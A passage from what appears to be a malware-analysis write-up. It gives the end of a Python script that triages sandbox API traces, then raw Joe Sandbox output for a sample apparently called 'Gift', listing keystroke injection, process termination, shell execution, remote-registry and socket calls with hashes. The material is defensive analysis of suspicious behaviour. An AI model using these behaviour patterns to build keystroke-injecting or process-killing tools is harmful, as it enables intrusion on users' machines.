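        elif c.api == "HttpQueryInfoW" and len(a) >= 2 and a[1] == HTTP_QUERY_CONTENT_LENGTH:
            findings.append(f"{c.ref:08X}: reads Content-Length before fetching the body")
        elif c.api == "PostMessageW" and len(a) >= 3 and a[1] in (WM_KEYDOWN, WM_KEYUP):
            key = VK_NAMES.get(a[2], f"vk=0x{a[2]:02X}" if a[2] is not None else "?")
            keys.append(("KEYDOWN" if a[1] == WM_KEYDOWN else "KEYUP", key, c.ref))
    if keys:
        attached = any(c.api == "AttachThreadInput" for c in calls)
        detail = ", ".join(f"{ev} {k}" for ev, k, _ in keys)
        findings.append(f"{keys[0][2]:08X}: synthetic keystrokes posted to another window"
                        f"{' after AttachThreadInput' if attached else ''}: {detail}")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_calls(SAMPLE)):
        print(finding)
```

Feed it any "APIs" block from the report (the bullets may be copied verbatim, indentation included) and extend IGNORE_FLAGS or VK_NAMES as needed; entries the regex does not recognise are skipped rather than raising, so a whole report can be piped through without pre-cleaning.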
                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0032915A,00000B00,?,?), ref: 003294E2
                                                                          • HeapAlloc.KERNEL32(00000000,?,0032915A,00000B00,?,?), ref: 003294E9
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0032915A,00000B00,?,?), ref: 003294FE
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0032915A,00000B00,?,?), ref: 00329506
                                                                          • DuplicateHandle.KERNEL32(00000000,?,0032915A,00000B00,?,?), ref: 00329509
                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0032915A,00000B00,?,?), ref: 00329519
                                                                          • GetCurrentProcess.KERNEL32(0032915A,00000000,?,0032915A,00000B00,?,?), ref: 00329521
                                                                          • DuplicateHandle.KERNEL32(00000000,?,0032915A,00000B00,?,?), ref: 00329524
                                                                          • CreateThread.KERNEL32(00000000,00000000,0032954A,00000000,00000000,00000000), ref: 0032953E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                          • String ID:
                                                                          • API String ID: 1957940570-0
                                                                          • Opcode ID: a3cd2511c6f326836a743781679cfbe7977725ee7e403a8c8fb4f8727f2171d5
                                                                          • Instruction ID: c56aaf3a3ff547534030f74988f6fd3d43dc209b59fde13886687106f6c5bfe7
                                                                          • Opcode Fuzzy Hash: a3cd2511c6f326836a743781679cfbe7977725ee7e403a8c8fb4f8727f2171d5
                                                                          • Instruction Fuzzy Hash: F101CDB5240304BFE711AFA5DC4EF6B7BACEB8A711F108411FA05DB1A1CAB19810CB20
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: 3e6eef73fda25c0b322b3aa46b34e04b8d77b4607a4cbe58e122ad391fdcdfa4
• Instruction ID: d59d8a27edb3155ca07b1bf8b361a3267f3befbce2ebc739a5db25eea440990c
• Opcode Fuzzy Hash: 3e6eef73fda25c0b322b3aa46b34e04b8d77b4607a4cbe58e122ad391fdcdfa4
• Instruction Fuzzy Hash: 76C1B271A4061A9FDF12DF98C885AAEB7F9FF48310F158469E945AF280E770ED40CB51
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-625585964
• Opcode ID: d59f649f65324b862b3912497fcdd051eb56070b1e9599032469568d61a93957
• Instruction ID: 1d53ca814c8b6aa734c6a51f74658f13cca0a0d9a4ca27c6e2022f41f6d23b33
• Opcode Fuzzy Hash: d59f649f65324b862b3912497fcdd051eb56070b1e9599032469568d61a93957
• Instruction Fuzzy Hash: 94917B70A00219ABDF26DFA5C885FAFBBB8EF45710F10855EE515AF290D770A944CFA0
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00357449
• SendMessageW.USER32(?,00001036,00000000,?), ref: 0035745D
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00357477
• _wcscat.LIBCMT ref: 003574D2
• SendMessageW.USER32(?,00001057,00000000,?), ref: 003574E9
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00357517
Similarity
• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
• Opcode ID: dc6662b85f0cd3452a8f7f581a41db9b65905438d17da308e29b7a99e7624b92
• Instruction ID: 010b324be09780f70fb0490780a2e5f1a97459eb91b1bcb1231ba0b651c16756
• Opcode Fuzzy Hash: dc6662b85f0cd3452a8f7f581a41db9b65905438d17da308e29b7a99e7624b92
• Instruction Fuzzy Hash: E141B570904348AFDB229F64DC85FEEB7A8EF08351F11446AF945A72E1D7719D88CB60
APIs
  • Part of subcall function 00334148: CreateToolhelp32Snapshot.KERNEL32 ref: 0033416D
  • Part of subcall function 00334148: Process32FirstW.KERNEL32(00000000,?), ref: 0033417B
  • Part of subcall function 00334148: FindCloseChangeNotification.KERNEL32(00000000), ref: 00334245
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0034F08D
• GetLastError.KERNEL32 ref: 0034F0A0
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0034F0CF
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0034F14C
• GetLastError.KERNEL32(00000000), ref: 0034F157
• CloseHandle.KERNEL32(00000000), ref: 0034F18C
Similarity
• API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 1701285019-2896544425
• Opcode ID: 991f0e77973c885190f2ea685f053844a9006be0087b9bffee6f45e07f47c49c
• Instruction ID: c9cc3f99cf49eb15ad3b1317f5d795f25b959a5d630ee3afabd930ebcd5806e5
• Opcode Fuzzy Hash: 991f0e77973c885190f2ea685f053844a9006be0087b9bffee6f45e07f47c49c
• Instruction Fuzzy Hash: 0041A9302002119FDB26EF24DC96F6EB7A9AF84714F188459F8028F392CBB4A914CB95
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00334802
• LoadStringW.USER32(00000000), ref: 00334809
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0033481F
• LoadStringW.USER32(00000000), ref: 00334826
• _wprintf.LIBCMT ref: 0033484C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0033486A
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00334847
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: f6d522c8db8d81a96bbcadfffeefa0e3a4d2bd4fbd48700fe7ef8b1e71654379
• Instruction ID: 6d9e1cd62dbe0c675fd7008014568259bf9d2c324e0a95b118999b0533baf2ed
• Opcode Fuzzy Hash: f6d522c8db8d81a96bbcadfffeefa0e3a4d2bd4fbd48700fe7ef8b1e71654379
• Instruction Fuzzy Hash: 3D0144F69002087FE7169790DE8AEF7776CDB08300F404595F749D6041E7B4AE944B75
APIs
  • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
• GetSystemMetrics.USER32(0000000F), ref: 0035DB42
• GetSystemMetrics.USER32(0000000F), ref: 0035DB62
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0035DD9D
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0035DDBB
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0035DDDC
• ShowWindow.USER32(00000003,00000000), ref: 0035DDFB
• InvalidateRect.USER32(?,00000000,00000001), ref: 0035DE20
• DefDlgProcW.USER32(?,00000005,?,?), ref: 0035DE43
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
• Opcode ID: d4124a37f8b2a5039a31689823615253c64465bbf370dedd808f6ed35f653a9b
• Instruction ID: dd8fb43cb05ca998dabcb3e6426c6975389aaa04c63b2c3f49dadd163dc08eb2
• Opcode Fuzzy Hash: d4124a37f8b2a5039a31689823615253c64465bbf370dedd808f6ed35f653a9b
• Instruction Fuzzy Hash: 1EB19C31600215EFDF26CF69C9C6BAE7BB5FF04702F098069EC489E2A5D771A954CB90
APIs
  • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
  • Part of subcall function 0035147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0035040D,?,?), ref: 00351491
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0035044E
Similarity
• API ID: BuffCharConnectRegistryUpper_memmove
• String ID:
• API String ID: 3479070676-0
• Opcode ID: f3fadb6659f7b3524021a4b729d79b6391233147ad3563c76e7f37a697412d0b
• Instruction ID: 59dfe505f496fd71ba1a915bf6708c8625d2df5263dc644afba5ebb5bacb070b
• Opcode Fuzzy Hash: f3fadb6659f7b3524021a4b729d79b6391233147ad3563c76e7f37a697412d0b
• Instruction Fuzzy Hash: E0A18C702042019FCB16EF64C881F2EB7E5EF84315F14891DF9968B2A2DB71E969CF42
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0030C508,00000004,00000000,00000000,00000000), ref: 002D2E9F
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0030C508,00000004,00000000,00000000,00000000,000000FF), ref: 002D2EE7
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0030C508,00000004,00000000,00000000,00000000), ref: 0030C55B
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0030C508,00000004,00000000,00000000,00000000), ref: 0030C5C7
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 1135d5c2bb64c3a714e316a861a5083586aa961b88474109a14a412a9b2979ea
• Instruction ID: 2a8c09f6cfffe012308c2678e9f4ff07860bc1f4d0d0336b2c5316b63415e375
• Opcode Fuzzy Hash: 1135d5c2bb64c3a714e316a861a5083586aa961b88474109a14a412a9b2979ea
• Instruction Fuzzy Hash: 26410C34638681DAC73B8F29CC9976B7BD5ABA2300F18895FE447467A1C7B1BC68D710
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 00337698
  • Part of subcall function 002F0FE6: std::exception::exception.LIBCMT ref: 002F101C
  • Part of subcall function 002F0FE6: __CxxThrowException@8.LIBCMT ref: 002F1031
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003376CF
• EnterCriticalSection.KERNEL32(?), ref: 003376EB
• _memmove.LIBCMT ref: 00337739
• _memmove.LIBCMT ref: 00337756
• LeaveCriticalSection.KERNEL32(?), ref: 00337765
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0033777A
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00337799
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
• Opcode ID: bf96c2edb9a549c05a2b26ae2023c8b932eeb9a2de18e5d3cbe426bcd97de10e
• Instruction ID: 1b6b78ecda058cec9b6cad5da337316d2bee3d3970f1041af6a01264ff67b888
• Opcode Fuzzy Hash: bf96c2edb9a549c05a2b26ae2023c8b932eeb9a2de18e5d3cbe426bcd97de10e
• Instruction Fuzzy Hash: 8C319072914208EBCB11EF54DC86E7FB778EF45340F1480A9FD04AA246DB709E60CBA0
APIs
• DeleteObject.GDI32(00000000), ref: 00356810
• GetDC.USER32(00000000), ref: 00356818
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00356823
• ReleaseDC.USER32(00000000,00000000), ref: 0035682F
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0035686B
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0035687C
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0035964F,?,?,000000FF,00000000,?,000000FF,?), ref: 003568B6
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003568D6
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 3864802216-0
                                                                          • Opcode ID: 42b2be5f9b568160287e3a3561f0cef1962d59b1bc9652b4a9c764ab119e5362
                                                                          • Instruction ID: bb4b5b28fb67821b1473200c83c24ab085f997ae9994963331b8b4e1e3c88d68
                                                                          • Opcode Fuzzy Hash: 42b2be5f9b568160287e3a3561f0cef1962d59b1bc9652b4a9c764ab119e5362
                                                                          • Instruction Fuzzy Hash: 1B314D721012147FEB168F50CC8AFAB3BADEB49761F054065FE089A2A1D7B59851CB74
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID:
                                                                          • API String ID: 2931989736-0
                                                                          • Opcode ID: 39148130df454c1cf1c030f5e60450b5b133f30c27d0b1fbc784b565b96e6651
                                                                          • Instruction ID: 2d0000fccf3364d4bbcecf68dbd000e3c38db1b100cae5e02cc8d58bd384f4b2
                                                                          • Opcode Fuzzy Hash: 39148130df454c1cf1c030f5e60450b5b133f30c27d0b1fbc784b565b96e6651
                                                                          • Instruction Fuzzy Hash: D421D772A21229BED206B524AD42FBF776C9E21784B049024FE06A6646E710DE31CAE1
                                                                          APIs
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                            • Part of subcall function 002E436A: _wcscpy.LIBCMT ref: 002E438D
                                                                          • _wcstok.LIBCMT ref: 0033F2D7
                                                                          • _wcscpy.LIBCMT ref: 0033F366
                                                                          • _memset.LIBCMT ref: 0033F399
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                          • String ID: X
                                                                          • API String ID: 774024439-3081909835
                                                                          • Opcode ID: 8f9fc6b6ed70bf1e286ed76d7bb3040711ee6332c477e2c3e16124c7a24ccd0d
                                                                          • Instruction ID: 862f5a3d443a0f6e941c7cc63e063e690e7b99bbc2929aafc1fd10ce11726b4b
                                                                          • Opcode Fuzzy Hash: 8f9fc6b6ed70bf1e286ed76d7bb3040711ee6332c477e2c3e16124c7a24ccd0d
                                                                          • Instruction Fuzzy Hash: 09C18B759147409FD715EF24C881A6BB7E4BF85350F90492EF8998B2A2DB30EC65CF82
                                                                          APIs
                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003472EB
                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0034730C
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0034731F
                                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 003473D5
                                                                          • inet_ntoa.WSOCK32(?), ref: 00347392
                                                                            • Part of subcall function 0032B4EA: _strlen.LIBCMT ref: 0032B4F4
                                                                            • Part of subcall function 0032B4EA: _memmove.LIBCMT ref: 0032B516
                                                                          • _strlen.LIBCMT ref: 0034742F
                                                                          • _memmove.LIBCMT ref: 00347498
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                          • String ID:
                                                                          • API String ID: 3619996494-0
                                                                          • Opcode ID: 4b8858e39419d5ec32fbb0020a5e3130f32f29b5c8565f6a3bc673887f2381c1
                                                                          • Instruction ID: f0e93fc33d6d9b8f338a04fad271079ab663e75ee0058e1cd6bae8fd3405a51e
                                                                          • Opcode Fuzzy Hash: 4b8858e39419d5ec32fbb0020a5e3130f32f29b5c8565f6a3bc673887f2381c1
                                                                          • Instruction Fuzzy Hash: 4C81CF71118200AFC311EB25DC86E6BB7E8EF84714F10891DF9569B3A2DB70ED11CB92
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cd4cdac7d8df9578fec1606a31c71bf8773f154ee5689ce929f202b54d3ba9fe
                                                                          • Instruction ID: 9f748ace7cb4c0357fda93d16324c534ec7680aac1cfb2e85dfadb6dc79a0b57
                                                                          • Opcode Fuzzy Hash: cd4cdac7d8df9578fec1606a31c71bf8773f154ee5689ce929f202b54d3ba9fe
                                                                          • Instruction Fuzzy Hash: 4C714C30A10109FFDB09CF58CC49AAEBB79FF86314F14815AF915AA291C7709E61DFA0
                                                                          APIs
                                                                          • IsWindow.USER32(013752A0), ref: 0035BA5D
                                                                          • IsWindowEnabled.USER32(013752A0), ref: 0035BA69
                                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0035BB4D
                                                                          • SendMessageW.USER32(013752A0,000000B0,?,?), ref: 0035BB84
                                                                          • IsDlgButtonChecked.USER32(?,?), ref: 0035BBC1
                                                                          • GetWindowLongW.USER32(013752A0,000000EC), ref: 0035BBE3
                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0035BBFB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                          • String ID:
                                                                          • API String ID: 4072528602-0
                                                                          • Opcode ID: 599b92493fcb4b91778c973389d6268a6c90f29f5db112c261c5b961a13c4ea9
                                                                          • Instruction ID: c2ea0da0ccf1148370718d4e8a2ee339a9a8b28379e68b53f86310cddb4201da
                                                                          • Opcode Fuzzy Hash: 599b92493fcb4b91778c973389d6268a6c90f29f5db112c261c5b961a13c4ea9
                                                                          • Instruction Fuzzy Hash: D971CA34604205AFEB279F54C895FBAFBB9EF09302F114059ED86972B5CB71AC58CB60
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0034FB31
                                                                          • _memset.LIBCMT ref: 0034FBFA
                                                                          • ShellExecuteExW.SHELL32(?), ref: 0034FC3F
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                            • Part of subcall function 002E436A: _wcscpy.LIBCMT ref: 002E438D
                                                                          • GetProcessId.KERNEL32(00000000), ref: 0034FCB6
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0034FCE5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                          • String ID: @
                                                                          • API String ID: 3522835683-2766056989
                                                                          • Opcode ID: 39ff4fe58af9111b97977d175c727fd94574ce3ea2c63df7be3325a860fa709b
                                                                          • Instruction ID: 91223aefda805f8455f4362dab54eb3c889509f7b0e4c4317136f8524c0da87d
                                                                          • Opcode Fuzzy Hash: 39ff4fe58af9111b97977d175c727fd94574ce3ea2c63df7be3325a860fa709b
                                                                          • Instruction Fuzzy Hash: B461CC75A10619DFCB16EFA4C8919AEBBF5FF08310F14846AE846AB351CB30AD51CF90
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 0033178B
                                                                          • GetKeyboardState.USER32(?), ref: 003317A0
                                                                          • SetKeyboardState.USER32(?), ref: 00331801
                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0033182F
                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0033184E
                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00331894
                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003318B7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: e26f07138d10a3113b53bbdd99669917664dcc82fee0a76ee6febf92b49b93de
                                                                          • Instruction ID: 8f0393749edae67169a59d9aed751a3b73ae9b1eddf9b35dc2c9167bdd739111
                                                                          • Opcode Fuzzy Hash: e26f07138d10a3113b53bbdd99669917664dcc82fee0a76ee6febf92b49b93de
                                                                          • Instruction Fuzzy Hash: 0251D4A0A087D53DFB374628CC95BBABEE95B06300F0D8989E1D5498D2C3D89C94D760
                                                                          APIs
                                                                          • GetParent.USER32(00000000), ref: 003315A4
                                                                          • GetKeyboardState.USER32(?), ref: 003315B9
                                                                          • SetKeyboardState.USER32(?), ref: 0033161A
                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00331646
                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00331663
                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003316A7
                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003316C8
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: b5238551eef678bb2265033c8c3d971fa5d90c06ace5dd958bba04d1dc2f3492
                                                                          • Instruction ID: 6de8bc477b01c4ac46a2b14a7fcc43d40dcba7240955c4a2ed87139083f3cc95
                                                                          • Opcode Fuzzy Hash: b5238551eef678bb2265033c8c3d971fa5d90c06ace5dd958bba04d1dc2f3492
                                                                          • Instruction Fuzzy Hash: A15108A06087D53DFB378774CC96BBABEA95F06300F0C8589E5D54A8C3C694EC98E751
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
